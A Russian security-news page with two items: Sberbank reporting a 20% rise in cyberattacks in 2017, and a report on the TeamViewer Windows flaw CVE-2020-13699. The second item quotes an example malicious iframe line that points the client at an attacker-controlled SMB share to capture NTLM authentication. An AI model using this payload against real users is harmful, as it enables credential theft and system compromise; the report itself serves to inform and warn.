Сбербанк: число кибератак с начала 2017 года выросло на 20%

Сбербанк: число кибератак с начала 2017 года выросло на 20%

Сбербанк зафиксировал рост количества кибератак на 20% с начала 2017 года. Об этом пишет ТАСС. Зампредседателя правления Сбербанка Станислав Кузнецов отметил, что ни одна из них не нанесла ущерба банку.

«Мы фиксируем, что примерно на 20% увеличилось количество кибератак, в том числе и крупных. Но ни одна из этих атак не привела ни к каким к ущербам ни для клиентов, ни для инфраструктуры Сбербанка», — сказал он на ВЭФ во Владивостоке.

В 2016 году Сбербанку удалось отразить 74 кибератаки, пишет iz.ru.

Ранее ЦБ разработал новый стандарт в сфере кибербезопасности. Согласно нововведению, если у банка недостаточно ресурсов для защиты систем от хакерских атак, организация должна обратиться к услугам сторонней компании.

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

Уязвимость в Windows-клиенте TeamViewer позволяет взламывать пароли

Опасная уязвимость в TeamViewer для Windows может привести к взлому паролей пользователей и, как следствие, к компрометации всей операционной системы. Получившую идентификатор CVE-2020-13699 брешь можно использовать удалённо.

Специалисты советуют особо присмотреться к этой проблеме безопасности, поскольку с приходом COVID-19 TeamViewer для удалённого доступа стали использовать гораздо чаще.

CVE-2020-13699 представляет собой путь поиска или элемент без кавычек. Другими словами, приложение некорректно обрабатывает кастомные URI-хендлеры. Это может привести к эксплуатации в момент посещения вредоносного сайта.

«Атакующий может встроить вредоносный iframe в веб-сайт со специальным URL — iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs'. Именно эта ссылка запустит десктопный Windows-клиент TeamViewer и заставит его открыть удалённую SMB-шару», — объяснил Джеффри Хофманн, специалист в области кибербезопасности из компании Praetorian.

«Windows при этом осуществит NTLM-аутентификацию и этот запрос злоумышленник может использовать для выполнения кода».

Для успешной атаки киберпреступнику не обязательно проходить процесс аутентификации. Тем не менее в настоящее время нет информации об эксплуатации этой уязвимости в реальных атаках.

Anti-Malware TelegramПодписывайтесь на канал "Anti-Malware" в Telegram, чтобы первыми узнавать о новостях и наших эксклюзивных материалах по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru